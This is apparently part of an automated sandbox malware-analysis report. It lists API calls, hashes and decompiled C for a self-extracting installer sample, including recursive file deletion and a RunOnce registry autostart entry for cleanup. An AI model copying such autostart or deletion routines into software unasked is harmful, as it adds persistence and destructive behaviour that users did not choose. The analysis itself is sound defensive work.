                                                                                                                                                                                                    0x00fd30b6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd308b
                                                                                                                                                                                                    0x00fd308b
                                                                                                                                                                                                    0x00fd3091
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3093
                                                                                                                                                                                                    0x00fd3098
                                                                                                                                                                                                    0x00fd309a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd309c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd309c
                                                                                                                                                                                                    0x00fd3089
                                                                                                                                                                                                    0x00fd305c
                                                                                                                                                                                                    0x00fd3061
                                                                                                                                                                                                    0x00fd3063
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3063
                                                                                                                                                                                                    0x00fd302b
                                                                                                                                                                                                    0x00fd3032
                                                                                                                                                                                                    0x00fd303c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd303c
                                                                                                                                                                                                    0x00fd3006
                                                                                                                                                                                                    0x00fd300c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd300e
                                                                                                                                                                                                    0x00fd3015
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3015
                                                                                                                                                                                                    0x00fd2f80
                                                                                                                                                                                                    0x00fd2f3f
                                                                                                                                                                                                    0x00fd2f46
                                                                                                                                                                                                    0x00fd2f5f
                                                                                                                                                                                                    0x00fd2f5f
                                                                                                                                                                                                    0x00fd2f64
                                                                                                                                                                                                    0x00fd2f66
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2f66
                                                                                                                                                                                                    0x00fd2f4f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2f55
                                                                                                                                                                                                    0x00fd2f5d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00FD2F93
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00FD2FB2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00FD2FC6
                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 00FD2FE6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00FD2FF8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD301C
                                                                                                                                                                                                      • Part of subcall function 00FD51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FD2F4D,?,00000002,00000000), ref: 00FD5201
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2126469477-3395714304
                                                                                                                                                                                                    • Opcode ID: 137192de2ea147f74bed7dde1abdf0f1193cf6b0f75df20796d3fa4e85f11764
                                                                                                                                                                                                    • Instruction ID: d66007e389daef2f5ae5f88f126266f50522fc7a8203ef067cd8c5ab36d2543e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 137192de2ea147f74bed7dde1abdf0f1193cf6b0f75df20796d3fa4e85f11764
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF419A31E012199ADB30ABB19C4D75633AB9B547A5F0C0567EA41C2391EF78CE81FA62
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00FD2390(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    				int _t36;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                    				_t21 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                    				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                    				_t65 = __ecx;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_pop(_t62);
                                                                                                                                                                                                    					_pop(_t66);
                                                                                                                                                                                                    					_pop(_t46);
                                                                                                                                                                                                    					return E00FD6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00FD1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                    					_t58 = 0x104;
                                                                                                                                                                                                    					E00FD16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                    					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                    					_t63 = _t22;
                                                                                                                                                                                                    					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t58 = 0x104;
                                                                                                                                                                                                    						E00FD1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                    						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                    							_t58 = 0x104;
                                                                                                                                                                                                    							E00FD16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                    							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                    							DeleteFileA( &_v280);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                    								E00FD16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                    								_t58 = 0x104;
                                                                                                                                                                                                    								E00FD658A( &_v280, 0x104, 0xfd1140);
                                                                                                                                                                                                    								E00FD2390( &_v284);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                    					} while (_t36 != 0);
                                                                                                                                                                                                    					FindClose(_t63); // executed
                                                                                                                                                                                                    					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





















                                                                                                                                                                                                    0x00fd2398
                                                                                                                                                                                                    0x00fd239e
                                                                                                                                                                                                    0x00fd23a3
                                                                                                                                                                                                    0x00fd23a5
                                                                                                                                                                                                    0x00fd23ae
                                                                                                                                                                                                    0x00fd23b3
                                                                                                                                                                                                    0x00fd24cb
                                                                                                                                                                                                    0x00fd24d2
                                                                                                                                                                                                    0x00fd24d3
                                                                                                                                                                                                    0x00fd24d4
                                                                                                                                                                                                    0x00fd24df
                                                                                                                                                                                                    0x00fd23c2
                                                                                                                                                                                                    0x00fd23d1
                                                                                                                                                                                                    0x00fd23db
                                                                                                                                                                                                    0x00fd23e4
                                                                                                                                                                                                    0x00fd23f6
                                                                                                                                                                                                    0x00fd23fc
                                                                                                                                                                                                    0x00fd2401
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2407
                                                                                                                                                                                                    0x00fd2407
                                                                                                                                                                                                    0x00fd2408
                                                                                                                                                                                                    0x00fd2411
                                                                                                                                                                                                    0x00fd241f
                                                                                                                                                                                                    0x00fd247a
                                                                                                                                                                                                    0x00fd2483
                                                                                                                                                                                                    0x00fd2495
                                                                                                                                                                                                    0x00fd24a3
                                                                                                                                                                                                    0x00fd2421
                                                                                                                                                                                                    0x00fd242f
                                                                                                                                                                                                    0x00fd2453
                                                                                                                                                                                                    0x00fd245d
                                                                                                                                                                                                    0x00fd2466
                                                                                                                                                                                                    0x00fd2472
                                                                                                                                                                                                    0x00fd2472
                                                                                                                                                                                                    0x00fd242f
                                                                                                                                                                                                    0x00fd24af
                                                                                                                                                                                                    0x00fd24b5
                                                                                                                                                                                                    0x00fd24be
                                                                                                                                                                                                    0x00fd24c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd24c5

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,00FD8A3A,00FD11F4,00FD8A3A,00000000,?,?), ref: 00FD23F6
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,00FD11F8), ref: 00FD2427
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,00FD11FC), ref: 00FD243B
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00FD2495
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00FD24A3
                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00FD24AF
                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 00FD24BE
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(00FD8A3A), ref: 00FD24C5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                    • Opcode ID: 16d9d955b60b7c19deef59971a30cf21934fc5717c004a2969d2801544204472
                                                                                                                                                                                                    • Instruction ID: efda0eeb793fb3c8843b6417a11f9fbb62c431233fe62e6f102e4a5688e13d2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16d9d955b60b7c19deef59971a30cf21934fc5717c004a2969d2801544204472
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E231A832604644ABC320DB74DD4DAEB739EBFC5315F08492FB95582391EB38D909E792
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                    			E00FD2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				struct HINSTANCE__* _t12;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				signed char _t19;
                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                    				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                    					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t17 = _t21;
                                                                                                                                                                                                    							 *0xfda288(0, 1, 0, 0);
                                                                                                                                                                                                    							 *_t21();
                                                                                                                                                                                                    							_t29 = _t24 - _t24;
                                                                                                                                                                                                    							if(_t24 != _t24) {
                                                                                                                                                                                                    								_t17 = 4;
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t20 = _a12;
                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                    				 *0xfd9124 = 0;
                                                                                                                                                                                                    				if(E00FD2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                    					_t9 = E00FD2F1D(_t18, _t20); // executed
                                                                                                                                                                                                    					_t22 = _t9; // executed
                                                                                                                                                                                                    					E00FD52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                    					if(_t22 != 0) {
                                                                                                                                                                                                    						_t32 =  *0xfd8a3a; // 0x0
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							_t19 =  *0xfd9a2c; // 0x0
                                                                                                                                                                                                    							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                    								E00FD1F90(_t19, _t21, _t22);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t6 =  *0xfd8588; // 0x0
                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 =  *0xfd9124; // 0x0
                                                                                                                                                                                                    				return _t7;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00fd2c03
                                                                                                                                                                                                    0x00fd2c0d
                                                                                                                                                                                                    0x00fd2c18
                                                                                                                                                                                                    0x00fd2c20
                                                                                                                                                                                                    0x00fd2c2e
                                                                                                                                                                                                    0x00fd2c32
                                                                                                                                                                                                    0x00fd2c36
                                                                                                                                                                                                    0x00fd2c3d
                                                                                                                                                                                                    0x00fd2c43
                                                                                                                                                                                                    0x00fd2c45
                                                                                                                                                                                                    0x00fd2c47
                                                                                                                                                                                                    0x00fd2c49
                                                                                                                                                                                                    0x00fd2c4e
                                                                                                                                                                                                    0x00fd2c4e
                                                                                                                                                                                                    0x00fd2c47
                                                                                                                                                                                                    0x00fd2c32
                                                                                                                                                                                                    0x00fd2c20
                                                                                                                                                                                                    0x00fd2c50
                                                                                                                                                                                                    0x00fd2c54
                                                                                                                                                                                                    0x00fd2c57
                                                                                                                                                                                                    0x00fd2c64
                                                                                                                                                                                                    0x00fd2c66
                                                                                                                                                                                                    0x00fd2c6b
                                                                                                                                                                                                    0x00fd2c6d
                                                                                                                                                                                                    0x00fd2c74
                                                                                                                                                                                                    0x00fd2c76
                                                                                                                                                                                                    0x00fd2c7c
                                                                                                                                                                                                    0x00fd2c7e
                                                                                                                                                                                                    0x00fd2c87
                                                                                                                                                                                                    0x00fd2c89
                                                                                                                                                                                                    0x00fd2c89
                                                                                                                                                                                                    0x00fd2c87
                                                                                                                                                                                                    0x00fd2c7c
                                                                                                                                                                                                    0x00fd2c74
                                                                                                                                                                                                    0x00fd2c8e
                                                                                                                                                                                                    0x00fd2c95
                                                                                                                                                                                                    0x00fd2c98
                                                                                                                                                                                                    0x00fd2c98
                                                                                                                                                                                                    0x00fd2c9e
                                                                                                                                                                                                    0x00fd2ca7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,00FD6BB0,00FD0000,00000000,00000002,0000000A), ref: 00FD2C03
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00FD6BB0,00FD0000,00000000,00000002,0000000A), ref: 00FD2C18
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00FD2C28
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00FD6BB0,00FD0000,00000000,00000002,0000000A), ref: 00FD2C98
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                    • Opcode ID: 5f03cf8d9b620d3d25c3fd969be92376eb85eb8df5c7b874056fd2155a4ee04c
                                                                                                                                                                                                    • Instruction ID: 3f128e9f14b36b9c8c93545f7db93b08a09c0d20c5c1dc53855b7da0ac1cc65e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f03cf8d9b620d3d25c3fd969be92376eb85eb8df5c7b874056fd2155a4ee04c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58112531A213096BC7617BB5AC89A2F376BAB943B0B0C0017F810D3354CA35DC01B6E5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD6F40() {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(E00FD6EF0); // executed
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00fd6f45
                                                                                                                                                                                                    0x00fd6f4d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00FD6F45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    • Opcode ID: 99314deffbf80ef403d775150fd57254e2450ba552af3f28560abc928c76b42b
                                                                                                                                                                                                    • Instruction ID: acd3f754af4844797df6bcf1791458c2b0ee50f4d3dd9082eb1f6e02ddf59605
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99314deffbf80ef403d775150fd57254e2450ba552af3f28560abc928c76b42b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA9002642521049796101B709D1941577935B4D602B855562E011C4595DB608040791B
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00FD202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                    				int _v540;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				struct HINSTANCE__* _t46;
                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				void _t56;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				intOrPtr* _t81;
                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t79 = __edx;
                                                                                                                                                                                                    				_t28 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                    				_t84 = 0x104;
                                                                                                                                                                                                    				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                    				_t95 = _t94 + 0x18;
                                                                                                                                                                                                    				_t66 = 0;
                                                                                                                                                                                                    				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                    					return E00FD6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(_t86);
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E00FD171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                    					_t95 = _t95 + 0x10;
                                                                                                                                                                                                    					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t87 = _t87 + 1;
                                                                                                                                                                                                    					if(_t87 < 0xc8) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t87 != 0xc8) {
                                                                                                                                                                                                    					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                    					_t79 = _t84;
                                                                                                                                                                                                    					E00FD658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                    					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                    					_t84 = _t46;
                                                                                                                                                                                                    					if(_t84 == 0) {
                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0xfd9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                    							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							_pop(_t86);
                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						_t72 =  &_v268;
                                                                                                                                                                                                    						_t80 = _t72 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t49 =  *_t72;
                                                                                                                                                                                                    							_t72 = _t72 + 1;
                                                                                                                                                                                                    						} while (_t49 != 0);
                                                                                                                                                                                                    						_t73 = _t72 - _t80;
                                                                                                                                                                                                    						_t81 = 0xfd91e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t50 =  *_t81;
                                                                                                                                                                                                    							_t81 = _t81 + 1;
                                                                                                                                                                                                    						} while (_t50 != 0);
                                                                                                                                                                                                    						_t84 = _t73 + 0x50 + _t81 - 0xfd91e5;
                                                                                                                                                                                                    						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xfd91e5);
                                                                                                                                                                                                    						if(_t90 != 0) {
                                                                                                                                                                                                    							 *0xfd8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                    							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								_t54 = "%s /D:%s";
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                    							E00FD171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                    							_t75 = _t90;
                                                                                                                                                                                                    							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                    							_t79 = _t23;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t56 =  *_t75;
                                                                                                                                                                                                    								_t75 = _t75 + 1;
                                                                                                                                                                                                    							} while (_t56 != 0);
                                                                                                                                                                                                    							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                    							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                    							RegCloseKey(_v532); // executed
                                                                                                                                                                                                    							_t36 = LocalFree(_t90);
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t79 = 0x4b5;
                                                                                                                                                                                                    						E00FD44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                    					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                    					FreeLibrary(_t84); // executed
                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    						E00FD658A( &_v268, 0x104, 0xfd1140);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    				 *0xfd8530 = _t66;
                                                                                                                                                                                                    				goto L23;
